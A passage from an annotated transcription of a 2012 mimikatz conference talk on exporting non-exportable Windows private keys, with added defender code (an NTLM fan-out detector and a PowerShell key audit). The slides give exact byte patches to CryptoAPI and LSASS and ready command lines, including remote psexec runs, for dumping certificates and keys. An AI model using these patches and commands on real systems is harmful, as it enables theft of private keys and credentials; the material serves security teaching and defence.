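INTERACTIVE_LOGON_TYPES = {2, 10, 11}   # Interactive, RemoteInteractive, CachedInteractive
NETWORK_LOGON_TYPE = 3


def _event(minute, user, logon_type, package, workstation, computer):
    return {"TimeCreated": datetime(2012, 11, 7, 9, minute),
            "TargetUserName": user, "LogonType": logon_type,
            "AuthenticationPackageName": package,
            "WorkstationName": workstation, "Computer": computer}


# Constructed sample: one admin logging on at an ordinary desk, then reaching
# three servers with NTLM in a few minutes; one ordinary user doing nothing odd.
SAMPLE_EVENTS = [
    _event(0, "dadmin", 2, "Negotiate", "WKS-17", "WKS-17"),
    _event(1, "dadmin", 3, "NTLM", "WKS-17", "SRV-FS01"),
    _event(2, "dadmin", 3, "NTLM", "WKS-17", "SRV-FS02"),
    _event(4, "dadmin", 3, "NTLM", "WKS-17", "SRV-DC01"),
    _event(5, "bob", 3, "NTLM", "WKS-22", "SRV-FS01"),
    _event(6, "bob", 3, "Kerberos", "WKS-22", "SRV-FS02"),
    _event(7, "bob", 3, "Kerberos", "WKS-22", "SRV-DC01"),
    _event(8, "dadmin", 2, "Negotiate", "ADM-JUMP01", "ADM-JUMP01"),
    _event(30, "dadmin", 3, "NTLM", "WKS-17", "SRV-FS03"),   # outside the window
]


def privileged_interactive_logons(events, privileged, allowed_hosts=frozenset()):
    """Interactive logons by privileged accounts anywhere but the hosts
    reserved for privileged tasks (the slide's separate network/forest)."""
    return [e for e in events
            if e["TargetUserName"] in privileged
            and e["LogonType"] in INTERACTIVE_LOGON_TYPES
            and e["Computer"] not in allowed_hosts]


def ntlm_fan_out(events, min_hosts=3, window=timedelta(minutes=10)):
    """One account from one source workstation reaching at least min_hosts
    distinct computers with NTLM network logons inside the window: the
    footprint a pass-the-hash run leaves, whatever tool produced it."""
    by_source = defaultdict(list)
    for e in events:
        if e["LogonType"] == NETWORK_LOGON_TYPE and e["AuthenticationPackageName"] == "NTLM":
            by_source[(e["WorkstationName"], e["TargetUserName"])].append(e)
    findings = []
    for (workstation, user), evs in by_source.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        for i, first in enumerate(evs):
            hosts = {e["Computer"] for e in evs[i:]
                     if e["TimeCreated"] - first["TimeCreated"] <= window}
            if len(hosts) >= min_hosts:
                findings.append({"workstation": workstation, "account": user,
                                 "hosts": sorted(hosts), "start": first["TimeCreated"]})
                break   # one finding per source is enough
    return findings


if __name__ == "__main__":
    for f in privileged_interactive_logons(SAMPLE_EVENTS, {"dadmin"}, {"ADM-JUMP01"}):
        print("privileged interactive logon:", f["TargetUserName"], "on", f["Computer"])
    for f in ntlm_fan_out(SAMPLE_EVENTS):
        print("NTLM fan-out:", f["account"], "from", f["workstation"], "to", f["hosts"])
```

The second check is also the measurable side of "Disable NTLM (available with NT6)": once NTLM is restricted, any NTLM network logon at all becomes a finding rather than a pattern to count.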

Page 38: mimikatz @ asfws

mimikatz :: crypto – what is it? (mod_mimikatz_crypto)

A little module that I wrote to:
– play with Windows Cryptographic API / CNG and RSA keys
– automate export of certificates/keys
• Even those which are "not" exportable

What the crypto module can do:
– List
• Providers
• Stores
• Certificates
• Keys
– Export
• Certificates
  – public in DER format
  – with private keys in PFX format
• Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
• CryptoAPI in mimikatz context
• CNG in LSASS context (again!)

Page 39: mimikatz @ asfws

mimikatz :: crypto – how it's protected

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
• At least not without the master keys and/or passwords of users

Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"

Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Password/popup: a constraint for most users; unavailable for computer keys)

    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport

Page 40: mimikatz @ asfws

mimikatz :: crypto :: capi – how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …

Processes deal with cryptographic keys through this API…

Page 41: mimikatz @ asfws

mimikatz :: crypto :: capi – how it's exported (PLAYSKOOL level)

[Diagram: the process asks CryptoAPI / the RSA CSP to export a key; the CSP loads the private key (DPAPI decode) and checks "Exportable?": yes → exported key; no → NTE_BAD_KEY_STATE]

Page 42: mimikatz @ asfws

mimikatz :: crypto :: patchcapi – because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey

This function does all the work to prepare the export, and checks if the key is exportable ("Exportable?")

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé  : {470ADFBA-8718-4014-B05E-B30776B75A03}
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet: CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03}
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

Page 43: mimikatz @ asfws

mimikatz :: crypto :: patchcapi – because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!

I wrote "4" bytes in my memory space

    before: .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
    after:  .text:0AC0B7CB 90                   nop
            .text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

    before: .text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
    after:  .text:0AC1F749 90                   nop
            .text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare

Page 44: mimikatz @ asfws

mimikatz :: crypto :: patchcapi – demo time!

Import, export, import as not exportable…. export

Page 45: mimikatz @ asfws

mimikatz :: crypto :: patchcapi – limitations

Because:
– I'm lazy
– I've seen RSA keys in the majority of real life cases
• Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll

Page 46: mimikatz @ asfws

mimikatz :: crypto :: cng – how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context

The process uses RPC to call "Key isolation service" (keyiso) functions

It seems more secure than CryptoAPI…
– It is, but it's not perfect…

Page 47: mimikatz @ asfws

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 47

mimikatz :: crypto :: cng
how it’s exported (PLAYSKOOL level)

[Diagram: export flow between a user process and the KeyIso service]
– Process (CNG) -> RPC -> KeyIso service, hosted in the LSASS process (NT6 system protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP)
– in LSASS: ask to export key -> DPAPI decode -> load private key -> exportable?
  • yes: exported key is returned to the process
  • no: NTE_NOT_SUPPORTED is returned to the process

Page 48: mimikatz @ asfws


mimikatz :: crypto :: patchcng
because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls end up in lsass (keyiso): ncrypt!SPCryptExportKey

This function does all the work to prepare the export, and checks whether the key is exportable

mimikatz # crypto::exportKeys
[user] CNG keys:
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportable : NO
	Key size   : 2048
	Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
	mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) The requested operation is not supported.

(mimikatz output translated from French; 0x80090029 is NTE_NOT_SUPPORTED, the answer KeyIso gives for a non-exportable key)

Page 49: mimikatz @ asfws


mimikatz :: crypto :: patchcng
because sometimes I own LSASS

This time the checks and the keys live in the LSASS process… so what?

I write one byte into LSASS memory space: the conditional jump that only continues the export for exportable keys becomes unconditional (75 -> EB, jnz -> jmp)

.text:6C815210 75 1C jnz short continue_key_export

.text:6C815210 EB 1C jmp short continue_key_export

Page 50: mimikatz @ asfws


mimikatz :: crypto :: patchcng
demo time !

Import, export, import as not exportable…. export again


Page 51: mimikatz @ asfws


mimikatz :: crypto :: patchcng
limitations

The patch operation needs privileges (you are writing into LSASS memory):
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (possibly for other algorithms than RSA as well)

Not a limitation of mimikatz, but the Certificates MMC snap-in cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…


Page 52: mimikatz @ asfws


mimikatz :: crypto :: patchcng
bonus

Once one admin has patched LSASS, every user of the system benefits from the extra exports
– until reboot / KeyIso service restart (the patch lives only in LSASS memory; nothing on disk changes)

Other programs that do not check the export flag before asking for the export work too
– yeah, like the good old one: certutil

Before crypto::patchcng (certutil output translated from French):

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After crypto::patchcng:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.

Page 53: mimikatz @ asfws


mimikatz :: crypto
memo

Some commands:
– mimikatz crypto::patchcapi crypto::exportCertificates exit
– psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
– mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
– mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password:
– exported PFX files are protected with this password: mimikatz

Keys:
– when you import a certificate several times, exportable or not, Windows creates duplicate keys
– when you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • so yes, mimikatz can still export it
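The two slides above (the provider list that crypto::patchcapi covers, and the duplicate / orphaned keys left behind by the certificate store) are easy to check from the defender's side. The following PowerShell script is an added example written for this page; it is not part of the deck and not mimikatz code. It assumes Windows PowerShell 5.1 on .NET Framework 4.6+, that it runs in the session of the user whose store is audited (elevated if the machine stores and machine key files should be included), and that the key-file directories listed are the standard on-disk locations of the Microsoft software CSPs and KSP. Keys on smart cards may prompt for a PIN when opened. For every certificate with a private key it reports which provider holds the key (one of the rsaenh.dll CSPs, the Microsoft Software KSP, or something else), what the key's own exportability flag says, and what a real export attempt returns; for a CNG key that attempt travels over RPC to KeyIso in LSASS, exactly the path the deck patches, and a non-exportable key comes back as NTE_NOT_SUPPORTED (0x80090029). It then lists key files on disk that no certificate references any more.

```powershell
# Added example, not part of the original deck or of mimikatz: audit the
# private keys on this Windows box from the defender's side.
# Assumptions: Windows PowerShell 5.1 (.NET Framework 4.6+); run in the session
# of the user whose store is audited, elevated if you also want machine keys.

# The CSPs crypto::patchcapi targets (all implemented by rsaenh.dll), and the
# KSP crypto::patchcng targets.
$RsaenhCsps = @(
    'Microsoft Base Cryptographic Provider v1.0'
    'Microsoft Enhanced Cryptographic Provider v1.0'
    'Microsoft Enhanced RSA and AES Cryptographic Provider'
    'Microsoft RSA SChannel Cryptographic Provider'
    'Microsoft Strong Cryptographic Provider'
)
$SoftwareKsp = 'Microsoft Software Key Storage Provider'

# Try to pull the private key out the normal way and report what the provider
# answers. For a CNG key the call goes over RPC to the KeyIso service in LSASS;
# a key without AllowExport is refused with NTE_NOT_SUPPORTED (0x80090029).
function Test-KeyExport($Rsa) {
    try {
        if ($Rsa -is [System.Security.Cryptography.RSACng]) {
            $blob = $Rsa.Key.Export([System.Security.Cryptography.CngKeyBlobFormat]::GenericPrivateBlob)
        } else {
            $blob = $Rsa.ExportCspBlob($true)   # $true = include the private part
        }
        'exported ({0} bytes)' -f $blob.Length
    } catch {
        $e = $_.Exception
        if ($e.InnerException) { $e = $e.InnerException }   # unwrap MethodInvocationException
        'refused: 0x{0:X8} {1}' -f $e.HResult, $e.Message
    }
}

# One row per certificate that has a private key, in every store under Cert:\.
function Get-PrivateKeyInventory {
    Get-ChildItem -Path Cert:\ -Recurse -ErrorAction SilentlyContinue |
      Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509Certificate2] -and $_.HasPrivateKey } |
      ForEach-Object {
        $cert = $_
        $row = [ordered]@{
            Store = $cert.PSParentPath -replace '^.*::', ''
            Thumbprint = $cert.Thumbprint; Subject = $cert.Subject
            Api = 'non-RSA/unknown'; Provider = $null; UniqueName = $null
            FlagExportable = $null; ExportResult = $null; PatchTarget = 'none'
        }
        try {
            # RSACng for a CNG (KSP) key, RSACryptoServiceProvider for a CAPI (CSP) key
            $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
            if ($rsa -is [System.Security.Cryptography.RSACng]) {
                $row.Api = 'CNG'
                $row.Provider = $rsa.Key.Provider.Provider
                $row.UniqueName = $rsa.Key.UniqueName            # file name under ...\Crypto\Keys
                $row.FlagExportable = [bool]($rsa.Key.ExportPolicy -band [System.Security.Cryptography.CngExportPolicies]::AllowExport)
                $row.ExportResult = Test-KeyExport $rsa
            } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                $info = $rsa.CspKeyContainerInfo
                $row.Api = 'CAPI'
                $row.Provider = $info.ProviderName
                $row.UniqueName = $info.UniqueKeyContainerName   # file name under ...\Crypto\RSA\<SID>
                $row.FlagExportable = $info.Exportable
                $row.ExportResult = Test-KeyExport $rsa
            }
            if ($RsaenhCsps -contains $row.Provider)  { $row.PatchTarget = 'crypto::patchcapi' }
            elseif ($row.Provider -eq $SoftwareKsp)   { $row.PatchTarget = 'crypto::patchcng' }
        } catch {
            $row.ExportResult = 'open failed: ' + $_.Exception.Message
        }
        [pscustomobject]$row
      }
}

# Key files of the Microsoft software providers that no certificate references
# any more: the "deleted the certificate, key still on disk" case. Heuristic
# only: keys used by services or DPAPI rather than by certificates live here too.
function Find-OrphanKeyFiles([string[]] $ReferencedUniqueNames) {
    $dirs = @(
        "$env:APPDATA\Microsoft\Crypto\Keys"                 # CNG, current user
        "$env:APPDATA\Microsoft\Crypto\RSA"                  # CAPI, current user (per-SID subfolders)
        "$env:ProgramData\Microsoft\Crypto\Keys"             # CNG, machine
        "$env:ProgramData\Microsoft\Crypto\RSA\MachineKeys"  # CAPI, machine
    )
    Get-ChildItem -Path $dirs -File -Recurse -Force -ErrorAction SilentlyContinue |
      Where-Object { $ReferencedUniqueNames -notcontains $_.Name } |
      Select-Object FullName, LastWriteTime, Length
}

$inventory = Get-PrivateKeyInventory
$inventory | Format-Table Store, Api, Provider, FlagExportable, ExportResult, PatchTarget -AutoSize
Find-OrphanKeyFiles -ReferencedUniqueNames @($inventory.UniqueName | Where-Object { $_ }) | Format-Table -AutoSize
```

Two things to read from the output. A row with FlagExportable = False whose ExportResult says "exported" means the refusal is no longer being enforced (a patched KeyIso or CSP behaves exactly like that until the service restarts), so compare against a known-good host before trusting the flag. A CNG key whose policy allows export but not plaintext export also shows "refused" here, because GenericPrivateBlob is a plaintext format; that is expected and is not the same condition. Every orphan file is material mimikatz can still recover, so review each one rather than deleting the directory wholesale.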


Page 54: mimikatz @ asfws


mimikatz :: crypto
what can we do?

Exactly the same as for sekurlsa: what protects these keys is preventing privileged access to the accounts / computer in the first place!
– no admin, no admin, no admin…

Basics
– use smartcards / tokens for user certificates
– use Hardware Security Modules (HSM), even SoftHSM (on a separate, better-protected host; on the same box an admin can still read its memory)

More in depth
– see what Microsoft can do with the TPM from Windows 8
  • Virtual Smart Card seems promising
– verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • their biometrics stuff was a little buggy ;)


Page 55: mimikatz @ asfws


mimikatz
what else can it do?

– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM / AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– Applocker / SRP bypass
– Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilter actions
  • List notifications (process / thread / image / registry)
  • List object hooks and procedures
  • …


Page 56: mimikatz @ asfws


mimikatz
that’s all folks !

Thanks to / Merci à :

– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • partners and sponsors for sure!
– Microsoft for always considering it as normal/acceptable
– security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– you, for your attention!

Questions ?

Don’t be shy ;) especially if you have written the corresponding slide number


Page 57: mimikatz @ asfws


Blog, Source Code & Contact

blog     http://blog.gentilkiwi.com
mimikatz http://blog.gentilkiwi.com/mimikatz
source   https://code.google.com/p/mimikatz/
email    [email protected]
